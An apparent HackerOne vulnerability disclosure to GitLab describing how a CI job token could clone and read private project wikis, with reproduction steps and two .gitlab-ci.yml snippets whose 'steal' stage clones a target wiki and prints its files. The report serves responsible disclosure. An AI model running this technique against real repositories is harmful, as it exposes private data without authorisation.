**[HackerOne report #1075586](https://hackerone.com/reports/1075586)** by `shells3c` on 2021-01-10, assigned to @rchan-gitlab: [Report](#report) | [How To Reproduce](#how-to-reproduce) ## Report ##### Summary There was a problem by mistake while confirming the patch for the Wiki bug in the past report: #887755, and the fact that the bug is still there! I am able to git private wiki using the `CI_JOB_TOKEN` (public project) ##### Steps to reproduce 1. Create a project, set the **Wiki visibility** to **Only Project Members** in the setting page: `https://gitlab.com/<user>/<project>/edit` 2. Login as another user (attacker), create **.gitlab-ci.yml** in an arbitrary project: ```yml stages: - steal test: stage: steal script: - 'git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/company/api.wiki.git' - 'cd api.wiki && cat api-doc.md' ``` 3. In the pipeline output, you will able to read the content ##### Examples - Can't access this: https://gitlab.com/just4hack2/mypro/-/wikis/home - Try adding the following in your **.gitlab-ci.yml** and read the wiki: ```yml stages: - steal test: stage: steal script: - 'git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/just4hack2/mypro.wiki.git' - 'cd api.wiki' - 'ls' - 'cat home.md' ``` #### Impact Able to read the private Wiki of Gitlab projects ## How To Reproduce Please add [reproducibility information] to this section: 1. 1. 1. [reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues